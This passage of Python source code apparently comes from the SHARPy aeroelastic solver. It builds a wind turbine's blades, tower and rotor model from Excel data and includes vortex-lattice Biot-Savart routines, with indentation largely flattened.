blade.StructuralInformation.num_elem = len(rR) - 2
blade.StructuralInformation.compute_basic_num_node()
node_r, elem_r = create_node_radial_pos_from_elem_centres(rR*TipRad,
blade.StructuralInformation.num_node,
blade.StructuralInformation.num_elem,
blade.StructuralInformation.num_node_elem)
else:
# Use excel struct as nodes
# Check the number of nodes
blade.StructuralInformation.num_node_elem = 3
blade.StructuralInformation.num_node = len(rR)
if ((len(rR) - 1) % (blade.StructuralInformation.num_node_elem - 1)) == 0:
blade.StructuralInformation.num_elem = int((len(rR) - 1)/(blade.StructuralInformation.num_node_elem - 1))
node_r = rR*TipRad
elem_rR = rR[1::2] + 0.
elem_r = rR[1::2]*TipRad + 0.
else:
print("ERROR: Cannot build ", blade.StructuralInformation.num_node_elem, "-noded elements from ", blade.StructuralInformation.num_node, "nodes")
node_y = np.interp(rR,rR_structural,InPElAxis) + np.interp(rR,rR_structural,PreswpRef)
node_z = -np.interp(rR,rR_structural,OutPElAxis) - np.interp(rR,rR_structural,PrebendRef)
node_twist = -1.0*np.interp(rR,rR_structural,StrcTwst)
coordinates = create_blade_coordinates(blade.StructuralInformation.num_node, node_r, node_y, node_z)
if h5_cross_sec_prop is None:
# Stiffness
elem_EA = np.interp(elem_rR,rR_structural,EAStff)
elem_EIy = np.interp(elem_rR,rR_structural,FlpStff)
elem_EIz = np.interp(elem_rR,rR_structural,EdgStff)
elem_EIyz = np.interp(elem_rR,rR_structural,FlapEdgeStiff)
elem_GJ = np.interp(elem_rR,rR_structural,GJStff)
# Stiffness: estimate unknown properties
print('WARNING: The Poisson coefficient is assumed equal to 0.3')
print('WARNING: The cross-section area is used as the shear area')
poisson_coef = 0.3
elem_GAy = elem_EA/2.0/(1.0+poisson_coef)
elem_GAz = elem_EA/2.0/(1.0+poisson_coef)
# Inertia
elem_pos_cg_B = np.zeros((blade.StructuralInformation.num_elem,3),)
elem_pos_cg_B[:,1] = np.interp(elem_rR,rR_structural,InPcg)
elem_pos_cg_B[:,2] = -np.interp(elem_rR,rR_structural,OutPcg)
elem_mass_per_unit_length = np.interp(elem_rR,rR_structural,BMassDen)
elem_mass_iner_y = np.interp(elem_rR,rR_structural,FlpIner)
elem_mass_iner_z = np.interp(elem_rR,rR_structural,EdgIner)
elem_mass_iner_yz = np.interp(elem_rR,rR_structural,FlapEdgeIner)
# Inertia: estimate unknown properties
print('WARNING: Using perpendicular axis theorem to compute the inertia around xB')
elem_mass_iner_x = elem_mass_iner_y + elem_mass_iner_z
# Generate blade structural properties
blade.StructuralInformation.create_mass_db_from_vector(elem_mass_per_unit_length, elem_mass_iner_x, elem_mass_iner_y, elem_mass_iner_z, elem_pos_cg_B, elem_mass_iner_yz)
blade.StructuralInformation.create_stiff_db_from_vector(elem_EA, elem_GAy, elem_GAz, elem_GJ, elem_EIy, elem_EIz, elem_EIyz)
else: # read Mass/Stiffness from database
cross_prop=h5.readh5(h5_cross_sec_prop).str_prop
# create mass_db/stiffness_db (interpolate at mid-node of each element)
blade.StructuralInformation.mass_db = scint.interp1d(
cross_prop.radius, cross_prop.M, kind='cubic', copy=False, assume_sorted=True, axis=0,
bounds_error = False, fill_value='extrapolate')(node_r[1::2])
blade.StructuralInformation.stiffness_db = scint.interp1d(
cross_prop.radius, cross_prop.K, kind='cubic', copy=False, assume_sorted=True, axis=0,
bounds_error = False, fill_value='extrapolate')(node_r[1::2])
blade.StructuralInformation.generate_1to1_from_vectors(
num_node_elem = blade.StructuralInformation.num_node_elem,
num_node = blade.StructuralInformation.num_node,
num_elem = blade.StructuralInformation.num_elem,
coordinates = coordinates,
stiffness_db = blade.StructuralInformation.stiffness_db,
mass_db = blade.StructuralInformation.mass_db,
frame_of_reference_delta = 'y_AFoR',
vec_node_structural_twist = node_twist,
num_lumped_mass = 0)
# Boundary conditions
blade.StructuralInformation.boundary_conditions = np.zeros((blade.StructuralInformation.num_node), dtype = int)
blade.StructuralInformation.boundary_conditions[0] = 1
blade.StructuralInformation.boundary_conditions[-1] = -1
######################################################################
### AERODYNAMICS
######################################################################
# Read blade aerodynamic information from excel file
rR_aero = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'rR')
chord_aero = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlChord')
thickness_aero = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlThickness')
pure_airfoils_names = gc.read_column_sheet_type01(excel_file_name, excel_sheet_airfoil_info, 'Name')
pure_airfoils_thickness = gc.read_column_sheet_type01(excel_file_name, excel_sheet_airfoil_info, 'Thickness')
node_ElAxisAftLEc = np.interp(node_r,rR_structural*TipRad,ElAxisAftLEc)
# Read coordinates of the pure airfoils
n_pure_airfoils = len(pure_airfoils_names)
pure_airfoils_camber=np.zeros((n_pure_airfoils,n_points_camber,2),)
xls = pd.ExcelFile(excel_file_name)
excel_db = pd.read_excel(xls, sheet_name=excel_sheet_airfoil_coord)
for iairfoil in range(n_pure_airfoils):
# Look for the NaN
icoord=2
while(not(math.isnan(excel_db["%s_x" % pure_airfoils_names[iairfoil]][icoord]))):
icoord+=1
if(icoord==len(excel_db["%s_x" % pure_airfoils_names[iairfoil]])):
break
# Compute the camber of the airfoils at the defined chord points
pure_airfoils_camber[iairfoil,:,0], pure_airfoils_camber[iairfoil,:,1] = gc.get_airfoil_camber(excel_db["%s_x" % pure_airfoils_names[iairfoil]][2:icoord] , excel_db["%s_y" % pure_airfoils_names[iairfoil]][2:icoord], n_points_camber)
# Basic variables
n_elem_aero = len(rR_aero)
num_airfoils = blade.StructuralInformation.num_node
surface_distribution = np.zeros((blade.StructuralInformation.num_elem), dtype=int)
# Interpolate in the correct positions
node_chord = np.interp(node_r, rR_aero*TipRad, chord_aero)
# Define the nodes with aerodynamic properties
# Look for the first element that is going to be aerodynamic
first_aero_elem=0
while (elem_r[first_aero_elem]<=rR_aero[0]*TipRad):
first_aero_elem+=1
first_aero_node=first_aero_elem*(blade.StructuralInformation.num_node_elem-1)
aero_node = np.zeros((blade.StructuralInformation.num_node,), dtype=bool)
aero_node[first_aero_node:]=np.ones((blade.StructuralInformation.num_node-first_aero_node,),dtype=bool)
# Define the airfoil at each stage
# airfoils = blade.AerodynamicInformation.interpolate_airfoils_camber(pure_airfoils_camber,excel_aero_r, node_r, n_points_camber)
node_thickness = np.interp(node_r, rR_aero*TipRad, thickness_aero)
airfoils = blade.AerodynamicInformation.interpolate_airfoils_camber_thickness(pure_airfoils_camber, pure_airfoils_thickness, node_thickness, n_points_camber)
airfoil_distribution = np.linspace(0,blade.StructuralInformation.num_node-1,blade.StructuralInformation.num_node, dtype=int)
# User defined m distribution
if (m_distribution == 'user_defined') and (user_defined_m_distribution_type == 'last_geometric'):
# WSP =10.5
# dt = 0.01846909261369661/2
blade_nodes = blade.StructuralInformation.num_node
udmd_by_nodes = np.zeros((blade_nodes, chord_panels[0] + 1))
for inode in range(blade_nodes):
r = np.linalg.norm(blade.StructuralInformation.coordinates[inode, :])
vrel = np.sqrt(rotation_velocity**2*r**2 + wsp**2)
# ielem, inode_in_elem = gc.get_ielem_inode(blade.StructuralInformation.connectivities, inode)
last_length = vrel*dt/node_chord[inode]
if last_length <= 0.5:
    ratio = gc.get_factor_geometric_progression(last_length, 1., chord_panels)
    udmd_by_nodes[inode, -1] = 1.
    udmd_by_nodes[inode, 0] = 0.
    for im in range(chord_panels[0] - 1, 0, -1):
        udmd_by_nodes[inode, im] = udmd_by_nodes[inode, im + 1] - last_length
        last_length *= ratio
    # Check that the panel edges increase monotonically
    if (np.diff(udmd_by_nodes[inode, :]) < 0.).any():
        sys.exit("ERROR in the panel discretization of the blade in node %d" % (inode))
else:
    # Fall back to a uniform distribution when the required last panel
    # would be larger than half the chord
    print("WARNING: cannot match the last panel size for node:", inode)
    udmd_by_nodes[inode, :] = np.linspace(0, 1, chord_panels[0] + 1)
else:
udmd_by_nodes = None
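# Illustrative numbers for the geometric distribution above (made up, and the
# semantics of gc.get_factor_geometric_progression are assumed): with
# vrel = 70 m/s, dt = 0.01 s and chord = 3.5 m the target last panel is
# last_length = 70*0.01/3.5 = 0.2 in chord fractions. The ratio r is then
# assumed to solve 0.2*(1 + r + r**2 + ... + r**(M-1)) = 1 for M panels, so
# the panel sizes scale geometrically away from the trailing edge.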
# udmd_by_elements = gc.from_node_array_to_elem_matrix(udmd_by_nodes, rotor.StructuralInformation.connectivities[0:int((blade_nodes-1)/2), :])
# rotor.user_defined_m_distribution = (udmd_by_elements, udmd_by_elements, udmd_by_elements)
node_twist = np.zeros_like(node_chord)
if camber_effect_on_twist:
print("WARNING: The steady applied Mx should be manually multiplied by the density")
for inode in range(blade.StructuralInformation.num_node):
node_twist[inode] = gc.get_aoacl0_from_camber(airfoils[inode, :, 0], airfoils[inode, :, 1])
mu0 = gc.get_mu0_from_camber(airfoils[inode, :, 0], airfoils[inode, :, 1])
r = np.linalg.norm(blade.StructuralInformation.coordinates[inode, :])
vrel = np.sqrt(rotation_velocity**2*r**2 + wsp**2)
if inode == 0:
dr = 0.5*np.linalg.norm(blade.StructuralInformation.coordinates[1,:] - blade.StructuralInformation.coordinates[0,:])
elif inode == len(blade.StructuralInformation.coordinates[:,0]) - 1:
dr = 0.5*np.linalg.norm(blade.StructuralInformation.coordinates[-1,:] - blade.StructuralInformation.coordinates[-2,:])
else:
dr = 0.5*np.linalg.norm(blade.StructuralInformation.coordinates[inode + 1,:] - blade.StructuralInformation.coordinates[inode - 1,:])
moment_factor = 0.5*vrel**2*node_chord[inode]**2*dr
# print("node", inode, "mu0", mu0, "CMc/4", 2.*mu0 + np.pi/2*node_twist[inode])
blade.StructuralInformation.app_forces[inode, 3] = (2.*mu0 + np.pi/2*node_twist[inode])*moment_factor
airfoils[inode, :, 1] *= 0.
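# Background for the camber-to-twist substitution above (standard thin-airfoil
# relations, stated here as an assumption): node_twist holds the zero-lift
# angle alpha_0 of the cambered section, and the quarter-chord moment
# coefficient is CM_c/4 = 2*mu0 + (pi/2)*alpha_0, so a flat-plate airfoil plus
# the steady moment Mx = CM_c/4 * 0.5 * Vrel**2 * c**2 * dr reproduces the
# cambered loading (density omitted, see the WARNING above).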
# Write SHARPy format
blade.AerodynamicInformation.create_aerodynamics_from_vec(blade.StructuralInformation,
aero_node,
node_chord,
node_twist,
np.pi*np.ones_like(node_chord),
chord_panels,
surface_distribution,
m_distribution,
node_ElAxisAftLEc,
airfoil_distribution,
airfoils,
udmd_by_nodes)
######################################################################
## ROTOR
######################################################################
# Read from excel file
numberOfBlades = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'NumBl')
tilt = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'ShftTilt')*deg2rad
cone = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'Cone')*deg2rad
# pitch = gc.read_column_sheet_type01(excel_file_name, excel_sheet_rotor, 'Pitch')*deg2rad
# Apply pitch
blade.StructuralInformation.rotate_around_origin(np.array([1.,0.,0.]), -pitch_deg*deg2rad)
# Apply coning
blade.StructuralInformation.rotate_around_origin(np.array([0.,1.,0.]), -cone)
# Build the whole rotor
rotor = blade.copy()
for iblade in range(numberOfBlades-1):
blade2 = blade.copy()
blade2.StructuralInformation.rotate_around_origin(np.array([0.,0.,1.]), (iblade+1)*(360.0/numberOfBlades)*deg2rad)
rotor.assembly(blade2)
blade2 = None
rotor.remove_duplicated_points(tol_remove_points)
# Apply tilt
rotor.StructuralInformation.rotate_around_origin(np.array([0.,1.,0.]), tilt)
return rotor
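# Hypothetical usage sketch (illustrative values): the type02 builder also
# supports a user-defined chordwise panel distribution driven by wsp and dt.
#
#   import numpy as np
#   rotor = rotor_from_excel_type02(chord_panels=np.array([8], dtype=int),
#                                   rotation_velocity=1.37,  # rad/s, assumed
#                                   pitch_deg=0.,
#                                   m_distribution='user_defined',
#                                   user_defined_m_distribution_type='last_geometric',
#                                   wsp=10.5, dt=0.01)  # values are assumptions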
def generate_from_excel_type02(chord_panels,
rotation_velocity,
pitch_deg,
excel_file_name= 'database_excel_type02.xlsx',
excel_sheet_parameters = 'parameters',
excel_sheet_structural_blade = 'structural_blade',
excel_sheet_discretization_blade = 'discretization_blade',
excel_sheet_aero_blade = 'aero_blade',
excel_sheet_airfoil_info = 'airfoil_info',
excel_sheet_airfoil_coord = 'airfoil_coord',
excel_sheet_structural_tower = 'structural_tower',
m_distribution = 'uniform',
h5_cross_sec_prop = None,
n_points_camber = 100,
tol_remove_points = 1e-3,
user_defined_m_distribution_type = None,
wsp = 0.,
dt = 0.):
"""
generate_from_excel_type02
Function needed to generate a wind turbine from an excel database type02
Args:
chord_panels (int): Number of panels on the blade surface in the chord direction
rotation_velocity (float): Rotation velocity of the rotor
pitch_deg (float): pitch angle in degrees
excel_file_name (str): path to the excel database file
excel_sheet_structural_blade (str): name of the excel sheet with the blade structural properties
excel_sheet_discretization_blade (str): name of the excel sheet with the blade discretization
excel_sheet_aero_blade (str): name of the excel sheet with the blade aerodynamic properties
excel_sheet_airfoil_info (str): name of the excel sheet with the airfoil information
excel_sheet_airfoil_coord (str): name of the excel sheet with the airfoil coordinates
excel_sheet_parameters (str): name of the excel sheet with the global parameters
excel_sheet_structural_tower (str): name of the excel sheet with the tower structural properties
m_distribution (str): chordwise panel distribution (e.g. 'uniform')
h5_cross_sec_prop (str): h5 containing mass and stiffness matrices along the blade.
n_points_camber (int): number of points to define the camber of the airfoil
tol_remove_points (float): maximum distance to remove adjacent points
user_defined_m_distribution_type (str): type of user-defined chordwise panel distribution
wsp (float): wind speed (only used by the user-defined panel distribution)
dt (float): time step (only used by the user-defined panel distribution)
Returns:
wt (sharpy.utils.generate_cases.AeroelasticInformation): Aeroelastic information of the wind turbine
LC (list): list of all the Lagrange constraints needed in the cases (sharpy.utils.generate_cases.LagrangeConstraint)
MB (list): list of the multibody information of each body (sharpy.utils.generate_cases.BodyInformation)
"""
rotor = rotor_from_excel_type02(chord_panels,
rotation_velocity,
pitch_deg,
excel_file_name= excel_file_name,
excel_sheet_parameters = excel_sheet_parameters,
excel_sheet_structural_blade = excel_sheet_structural_blade,
excel_sheet_discretization_blade = excel_sheet_discretization_blade,
excel_sheet_aero_blade = excel_sheet_aero_blade,
excel_sheet_airfoil_info = excel_sheet_airfoil_info,
excel_sheet_airfoil_coord = excel_sheet_airfoil_coord,
m_distribution = m_distribution,
h5_cross_sec_prop = h5_cross_sec_prop,
n_points_camber = n_points_camber,
tol_remove_points = tol_remove_points,
                                    user_defined_m_distribution_type = user_defined_m_distribution_type,
                                    wsp = wsp,
                                    dt = dt)
######################################################################
## TOWER
######################################################################
# Read from excel file
HtFract = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'HtFract')
TMassDen = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TMassDen')
TwFAStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAStif')
TwSSStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSSStif')
# TODO> variables to be defined
TwGJStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwGJStif')
TwEAStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwEAStif')
TwFAIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAIner')
TwSSIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSSIner')
TwFAcgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAcgOf')
TwSScgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSScgOf')
# Define the TOWER
TowerHt = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'TowerHt')
Elevation = TowerHt*HtFract
tower = gc.AeroelasticInformation()
tower.StructuralInformation.num_elem = len(Elevation) - 2
tower.StructuralInformation.num_node_elem = 3
tower.StructuralInformation.compute_basic_num_node()
# Interpolate excel variables into the correct locations
node_r, elem_r = create_node_radial_pos_from_elem_centres(Elevation,
tower.StructuralInformation.num_node,
tower.StructuralInformation.num_elem,
tower.StructuralInformation.num_node_elem)
# Stiffness
elem_EA = np.interp(elem_r,Elevation,TwEAStif)
elem_EIz = np.interp(elem_r,Elevation,TwSSStif)
elem_EIy = np.interp(elem_r,Elevation,TwFAStif)
elem_GJ = np.interp(elem_r,Elevation,TwGJStif)
# Stiffness: estimate unknown properties
print('WARNING: The Poisson coefficient is assumed equal to 0.3')
print('WARNING: The cross-section area is used as the shear area')
poisson_coef = 0.3
elem_GAy = elem_EA/2.0/(1.0+poisson_coef)
elem_GAz = elem_EA/2.0/(1.0+poisson_coef)
# Inertia
elem_mass_per_unit_length = np.interp(elem_r,Elevation,TMassDen)
elem_mass_iner_y = np.interp(elem_r,Elevation,TwFAIner)
elem_mass_iner_z = np.interp(elem_r,Elevation,TwSSIner)
# TODO: check yz axis and Flap-edge
elem_pos_cg_B = np.zeros((tower.StructuralInformation.num_elem,3),)
elem_pos_cg_B[:,1]=np.interp(elem_r,Elevation,TwSScgOf)
elem_pos_cg_B[:,2]=np.interp(elem_r,Elevation,TwFAcgOf)
# Inertia: estimate unknown properties
print('WARNING: Using perpendicular axis theorem to compute the inertia around xB')
elem_mass_iner_x = elem_mass_iner_y + elem_mass_iner_z
# Create the tower
tower.StructuralInformation.create_mass_db_from_vector(elem_mass_per_unit_length, elem_mass_iner_x, elem_mass_iner_y, elem_mass_iner_z, elem_pos_cg_B)
tower.StructuralInformation.create_stiff_db_from_vector(elem_EA, elem_GAy, elem_GAz, elem_GJ, elem_EIy, elem_EIz)
coordinates = np.zeros((tower.StructuralInformation.num_node,3),)
coordinates[:,0] = node_r
tower.StructuralInformation.generate_1to1_from_vectors(
num_node_elem = tower.StructuralInformation.num_node_elem,
num_node = tower.StructuralInformation.num_node,
num_elem = tower.StructuralInformation.num_elem,
coordinates = coordinates,
stiffness_db = tower.StructuralInformation.stiffness_db,
mass_db = tower.StructuralInformation.mass_db,
frame_of_reference_delta = 'y_AFoR',
vec_node_structural_twist = np.zeros((tower.StructuralInformation.num_node,),),
num_lumped_mass = 1)
tower.StructuralInformation.boundary_conditions = np.zeros((tower.StructuralInformation.num_node), dtype = int)
tower.StructuralInformation.boundary_conditions[0] = 1
# Read overhang and nacelle properties from excel file
overhang_len = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'overhang')
# HubMass = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'HubMass')
NacelleMass = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'NacMass')
# NacelleYawIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'NacelleYawIner')
# Include nacelle mass
tower.StructuralInformation.lumped_mass_nodes = np.array([tower.StructuralInformation.num_node-1], dtype=int)
tower.StructuralInformation.lumped_mass = np.array([NacelleMass], dtype=float)
tower.AerodynamicInformation.set_to_zero(tower.StructuralInformation.num_node_elem,
tower.StructuralInformation.num_node,
tower.StructuralInformation.num_elem)
# Assemble the overhang with the tower
# numberOfBlades = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'NumBl')
tilt = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'ShftTilt')*deg2rad
# cone = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'Cone')*deg2rad
overhang = gc.AeroelasticInformation()
overhang.StructuralInformation.num_node = 3
overhang.StructuralInformation.num_node_elem = 3
overhang.StructuralInformation.compute_basic_num_elem()
node_pos = np.zeros((overhang.StructuralInformation.num_node,3), )
node_pos[:,0] += tower.StructuralInformation.coordinates[-1,0]
    # tilt was already converted to radians above, so no extra deg2rad factor
    node_pos[:,0] += np.linspace(0.,overhang_len*np.sin(tilt), overhang.StructuralInformation.num_node)
    node_pos[:,2] = np.linspace(0.,-overhang_len*np.cos(tilt), overhang.StructuralInformation.num_node)
# TODO: change the following by real values
# Same properties as the last element of the tower
print("WARNING: Using the structural properties of the last tower section for the overhang")
oh_mass_per_unit_length = tower.StructuralInformation.mass_db[-1,0,0]
oh_mass_iner = tower.StructuralInformation.mass_db[-1,3,3]
oh_EA = tower.StructuralInformation.stiffness_db[-1,0,0]
oh_GA = tower.StructuralInformation.stiffness_db[-1,1,1]
oh_GJ = tower.StructuralInformation.stiffness_db[-1,3,3]
oh_EI = tower.StructuralInformation.stiffness_db[-1,4,4]
overhang.StructuralInformation.generate_uniform_sym_beam(node_pos,
oh_mass_per_unit_length,
oh_mass_iner,
oh_EA,
oh_GA,
oh_GJ,
oh_EI,
num_node_elem = 3,
y_BFoR = 'y_AFoR',
num_lumped_mass=0)
overhang.StructuralInformation.boundary_conditions = np.zeros((overhang.StructuralInformation.num_node), dtype = int)
overhang.StructuralInformation.boundary_conditions[-1] = -1
overhang.AerodynamicInformation.set_to_zero(overhang.StructuralInformation.num_node_elem,
overhang.StructuralInformation.num_node,
overhang.StructuralInformation.num_elem)
tower.assembly(overhang)
tower.remove_duplicated_points(tol_remove_points)
######################################################################
## WIND TURBINE
######################################################################
# Assembly the whole case
wt = tower.copy()
hub_position = tower.StructuralInformation.coordinates[-1,:]
rotor.StructuralInformation.coordinates += hub_position
wt.assembly(rotor)
# Redefine the body numbers
wt.StructuralInformation.body_number *= 0
wt.StructuralInformation.body_number[tower.StructuralInformation.num_elem:wt.StructuralInformation.num_elem] += 1
######################################################################
## MULTIBODY
######################################################################
# Define the boundary condition between the rotor and the tower tip
LC1 = gc.LagrangeConstraint()
LC1.behaviour = 'hinge_node_FoR_constant_vel'
LC1.node_in_body = tower.StructuralInformation.num_node-1
LC1.body = 0
LC1.body_FoR = 1
LC1.rot_axisB = np.array([1.,0.,0.0])
LC1.rot_vel = -rotation_velocity
LC = []
LC.append(LC1)
    # Define the multibody information for the tower and the rotor
MB1 = gc.BodyInformation()
MB1.body_number = 0
MB1.FoR_position = np.zeros((6,),)
MB1.FoR_velocity = np.zeros((6,),)
MB1.FoR_acceleration = np.zeros((6,),)
MB1.FoR_movement = 'prescribed'
MB1.quat = np.array([1.0,0.0,0.0,0.0])
MB2 = gc.BodyInformation()
MB2.body_number = 1
MB2.FoR_position = np.array([rotor.StructuralInformation.coordinates[0, 0], rotor.StructuralInformation.coordinates[0, 1], rotor.StructuralInformation.coordinates[0, 2], 0.0, 0.0, 0.0])
MB2.FoR_velocity = np.array([0.,0.,0.,0.,0.,rotation_velocity])
MB2.FoR_acceleration = np.zeros((6,),)
MB2.FoR_movement = 'free'
MB2.quat = algebra.euler2quat(np.array([0.0,tilt,0.0]))
MB = []
MB.append(MB1)
MB.append(MB2)
######################################################################
## RETURN
######################################################################
return wt, LC, MB
```
#### File: linear/src/libuvlm.py
```python
import numpy as np
import ctypes as ct
from sharpy.utils.sharpydir import SharpyDir
import sharpy.utils.ctypes_utils as ct_utils
import sharpy.linear.src.libalg as libalg
libc=ct_utils.import_ctypes_lib(SharpyDir + '/lib/', 'libuvlm')
cfact_biot=0.25/np.pi
VORTEX_RADIUS=1e-2 # numerical radius of the vortex core
VORTEX_RADIUS_SQ=VORTEX_RADIUS**2
# local mapping segment/vertices of a panel
svec=[0,1,2,3] # seg. number
avec=[0,1,2,3] # 1st vertex of seg.
bvec=[1,2,3,0] # 2nd vertex of seg.
LoopPanel=[(0,1),(1,2),(2,3),(3,0)] # used in eval_panel_{exp/comp}
def biot_panel_cpp(zetaP,ZetaPanel,gamma=1.0):
assert zetaP.flags['C_CONTIGUOUS'] and ZetaPanel.flags['C_CONTIGUOUS'],\
'Input not C contiguous'
velP=np.zeros((3,),order='C')
libc.call_biot_panel(
velP.ctypes.data_as(ct.POINTER(ct.c_double)),
zetaP.ctypes.data_as(ct.POINTER(ct.c_double)),
ZetaPanel.ctypes.data_as(ct.POINTER(ct.c_double)),
ct.byref(ct.c_double(gamma)))
return velP
def joukovski_qs_segment(zetaA,zetaB,v_mid,gamma=1.0,fact=0.5):
'''
    Joukovski force over vertices A and B produced by the segment A->B.
    The factor fact allows the contribution over the vertices A and B to
    be computed directly (e.g. 0.5 each) or scaled to include DENSITY.
'''
rab=zetaB-zetaA
fs=libalg.cross3d(v_mid,rab)
gfact=fact*gamma
return gfact*fs
def biot_segment(zetaP,zetaA,zetaB,gamma=1.0):
'''
    Induced velocity at point P due to segment A->B carrying circulation gamma.
'''
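    # Standard Biot-Savart result for a straight vortex segment, as coded below:
    #   u = (gamma / (4*pi)) * (ra x rb) / |ra x rb|^2 * (rab.ra/|ra| - rab.rb/|rb|)
    # with a finite core cutoff (VORTEX_RADIUS) to regularise the singularity
    # when P approaches the segment.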
# differences
ra=zetaP-zetaA
rb=zetaP-zetaB
rab=zetaB-zetaA
ra_norm,rb_norm=libalg.norm3d(ra),libalg.norm3d(rb)
vcross=libalg.cross3d(ra,rb)
vcross_sq=np.dot(vcross,vcross)
    # numerical vortex-core cutoff
if vcross_sq<(VORTEX_RADIUS_SQ*libalg.normsq3d(rab)):
return np.zeros((3,))
q=((cfact_biot*gamma/vcross_sq)*\
( np.dot(rab,ra)/ra_norm - np.dot(rab,rb)/rb_norm)) * vcross
return q
def biot_panel(zetaC,ZetaPanel,gamma=1.0):
'''
    Induced velocity at point zetaC of a panel with vertex coordinates
    ZetaPanel and circulation gamma, where:
ZetaPanel.shape=(4,3)=[vertex local number, (x,y,z) component]
'''
q=np.zeros((3,))
for ss,aa,bb in zip(svec,avec,bvec):
q+=biot_segment(zetaC,ZetaPanel[aa,:],ZetaPanel[bb,:],gamma)
return q
def biot_panel_fast(zetaC,ZetaPanel,gamma=1.0):
'''
    Induced velocity at point zetaC of a panel with vertex coordinates
    ZetaPanel and circulation gamma, where:
ZetaPanel.shape=(4,3)=[vertex local number, (x,y,z) component]
'''
Cfact=cfact_biot*gamma
q=np.zeros((3,))
R_list = zetaC-ZetaPanel
Runit_list=[R_list[ii]/libalg.norm3d(R_list[ii]) for ii in svec]
for aa,bb in LoopPanel:
RAB=ZetaPanel[bb,:]-ZetaPanel[aa,:] # segment vector
Vcr = libalg.cross3d(R_list[aa],R_list[bb])
vcr2=np.dot(Vcr,Vcr)
if vcr2<(VORTEX_RADIUS_SQ*libalg.normsq3d(RAB)):
continue
q+=( (Cfact/vcr2)*np.dot(RAB,Runit_list[aa]-Runit_list[bb]) ) *Vcr
return q
def panel_normal(ZetaPanel):
'''
    Return the normal of a panel with vertex coordinates ZetaPanel, where:
ZetaPanel.shape=(4,3)
'''
# build cross-vectors
r02=ZetaPanel[2,:]-ZetaPanel[0,:]
r13=ZetaPanel[3,:]-ZetaPanel[1,:]
nvec=libalg.cross3d(r02,r13)
nvec=nvec/libalg.norm3d(nvec)
return nvec
def panel_area(ZetaPanel):
'''
    Return the area of a panel with vertex coordinates ZetaPanel, where:
    ZetaPanel.shape=(4,3)
    using Bretschneider's formula - valid for cyclic and non-cyclic quadrilaterals.
'''
# build cross-vectors
r02=ZetaPanel[2,:]-ZetaPanel[0,:]
r13=ZetaPanel[3,:]-ZetaPanel[1,:]
# build side vectors
r01=ZetaPanel[1,:]-ZetaPanel[0,:]
r12=ZetaPanel[2,:]-ZetaPanel[1,:]
r23=ZetaPanel[3,:]-ZetaPanel[2,:]
r30=ZetaPanel[0,:]-ZetaPanel[3,:]
# compute distances
d02=libalg.norm3d(r02)
d13=libalg.norm3d(r13)
d01=libalg.norm3d(r01)
d12=libalg.norm3d(r12)
d23=libalg.norm3d(r23)
d30=libalg.norm3d(r30)
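    # Bretschneider's formula in terms of the diagonals p=d02, q=d13 and the
    # sides a=d01, b=d12, c=d23, d=d30:
    #   A = 1/4 * sqrt( 4*p^2*q^2 - (b^2 + d^2 - a^2 - c^2)^2 )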
A=0.25*np.sqrt( (4.*d02**2*d13**2) - ((d12**2+d30**2)-(d01**2+d23**2))**2 )
return A
if __name__=='__main__':
import cProfile
### verify consistency amongst models
gamma=4.
zeta0=np.array([1.0,3.0,0.9])
zeta1=np.array([5.0,3.1,1.9])
zeta2=np.array([4.8,8.1,2.5])
zeta3=np.array([0.9,7.9,1.7])
ZetaPanel=np.array([zeta0,zeta1,zeta2,zeta3])
zetaP=np.array([3.0,5.5,2.0])
zetaP=zeta2*0.3+zeta3*0.7
### verify model consistency
qref=biot_panel(zetaP,ZetaPanel,gamma=gamma)
qfast=biot_panel_fast(zetaP,ZetaPanel,gamma=gamma)
qcpp=biot_panel_cpp(zetaP,ZetaPanel,gamma=gamma)
ermax=np.max(np.abs(qref-qfast))
assert ermax<1e-16, 'biot_panel_fast not matching with biot_panel'
ermax=np.max(np.abs(qref-qcpp))
assert ermax<1e-16, 'biot_panel_cpp not matching with biot_panel'
### profiling
def run_biot_panel_cpp():
for ii in range(10000):
biot_panel_cpp(zetaP,ZetaPanel,gamma=3.)
def run_biot_panel_fast():
for ii in range(10000):
biot_panel_fast(zetaP,ZetaPanel,gamma=3.)
def run_biot_panel_ref():
for ii in range(10000):
biot_panel(zetaP,ZetaPanel,gamma=3.)
print('------------------------------------------ profiling biot_panel_cpp')
cProfile.runctx('run_biot_panel_cpp()',globals(),locals())
print('----------------------------------------- profiling biot_panel_fast')
cProfile.runctx('run_biot_panel_fast()',globals(),locals())
print('------------------------------------------ profiling biot_panel_ref')
cProfile.runctx('run_biot_panel_ref()',globals(),locals())
```
#### File: linear/src/pp_aero.py
```python
import numpy as np
def total_forces(data,Gframe=True):
'''
Compute total aerodynamic forces over all lifting surfaces.
Requires 'AeroForcesCalculator' to be run.
'''
ts_max=len(data.structure.timestep_info)
Fst=np.zeros((ts_max,6))
Fun=np.zeros((ts_max,6))
for tt in range(ts_max):
if Gframe:
faero_st=data.aero.timestep_info[tt].inertial_steady_forces
faero_un=data.aero.timestep_info[tt].inertial_unsteady_forces
